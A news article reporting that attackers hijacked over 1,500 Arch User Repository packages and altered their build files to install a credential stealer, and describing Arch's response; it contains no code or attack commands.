Arch Linux AUR hit by malware targeting developer secrets

One of the largest open-source package repositories just spent a weekend cleaning up after a malware campaign that did not break into anything. It did not need to.

Attackers seized control of more than 1,500 packages in the Arch User Repository, or AUR, the community-run software collection that sits alongside Arch Linux’s official repositories, and quietly rewrote their build instructions to install a credential stealer on any machine that compiled them. By Monday, the project had taken the unusual step of freezing new account registration while it cleaned up.

The number kept moving. It started at around 400 packages, climbed past 1,500 over the weekend, and one tracking list named 1,579, which Arch itself described as “many, but not all” of those hit. Crucially, Arch’s core distribution and its official repos were never affected.

An attack on trust, not a flaw

What makes this notable is how little hacking was involved. The AUR is user-submitted and explicitly unsupported: Arch tells people to read a package’s build file before installing it, every time. There is no vetting, by design.